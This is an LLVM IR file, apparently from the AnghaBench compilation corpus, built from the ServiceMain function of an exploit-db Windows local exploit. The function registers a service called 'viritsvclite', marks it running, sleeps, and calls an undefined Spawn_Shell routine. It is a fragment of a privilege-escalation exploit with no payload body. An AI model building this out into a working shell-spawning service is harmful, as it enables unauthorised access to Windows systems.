; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_39843.c_ServiceMain.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_39843.c_ServiceMain.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_3__ = type { i32, i32, i64, i64, i64, i64, i32 }

@SERVICE_WIN32 = common dso_local global i32 0, align 4
@ServiceStatus = common dso_local global %struct.TYPE_3__ zeroinitializer, align 8
@SERVICE_START_PENDING = common dso_local global i32 0, align 4
@SERVICE_ACCEPT_STOP = common dso_local global i32 0, align 4
@SERVICE_ACCEPT_SHUTDOWN = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [13 x i8] c"viritsvclite\00", align 1
@ControlHandler = common dso_local global i64 0, align 8
@hStatus = common dso_local global i32 0, align 4
@SERVICE_RUNNING = common dso_local global i32 0, align 4
@big_sleep = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @ServiceMain(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %5 = load i32, i32* @SERVICE_WIN32, align 4
  store i32 %5, i32* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 6), align 8
  %6 = load i32, i32* @SERVICE_START_PENDING, align 4
  store i32 %6, i32* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 1), align 4
  %7 = load i32, i32* @SERVICE_ACCEPT_STOP, align 4
  %8 = load i32, i32* @SERVICE_ACCEPT_SHUTDOWN, align 4
  %9 = or i32 %7, %8
  store i32 %9, i32* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 0), align 8
  store i64 0, i64* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 5), align 8
  store i64 0, i64* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 4), align 8
  store i64 0, i64* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 3), align 8
  store i64 0, i64* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 2), align 8
  %10 = load i64, i64* @ControlHandler, align 8
  %11 = trunc i64 %10 to i32
  %12 = call i32 @RegisterServiceCtrlHandler(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str, i64 0, i64 0), i32 %11)
  store i32 %12, i32* @hStatus, align 4
  %13 = load i32, i32* @SERVICE_RUNNING, align 4
  store i32 %13, i32* getelementptr inbounds (%struct.TYPE_3__, %struct.TYPE_3__* @ServiceStatus, i32 0, i32 1), align 4
  %14 = load i32, i32* @hStatus, align 4
  %15 = call i32 @SetServiceStatus(i32 %14, %struct.TYPE_3__* @ServiceStatus)
  %16 = load i32, i32* @big_sleep, align 4
  %17 = call i32 @Sleep(i32 %16)
  %18 = call i32 (...) @Spawn_Shell()
  ret void
}

declare dso_local i32 @RegisterServiceCtrlHandler(i8*, i32) #1

declare dso_local i32 @SetServiceStatus(i32, %struct.TYPE_3__*) #1

declare dso_local i32 @Sleep(i32) #1

declare dso_local i32 @Spawn_Shell(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
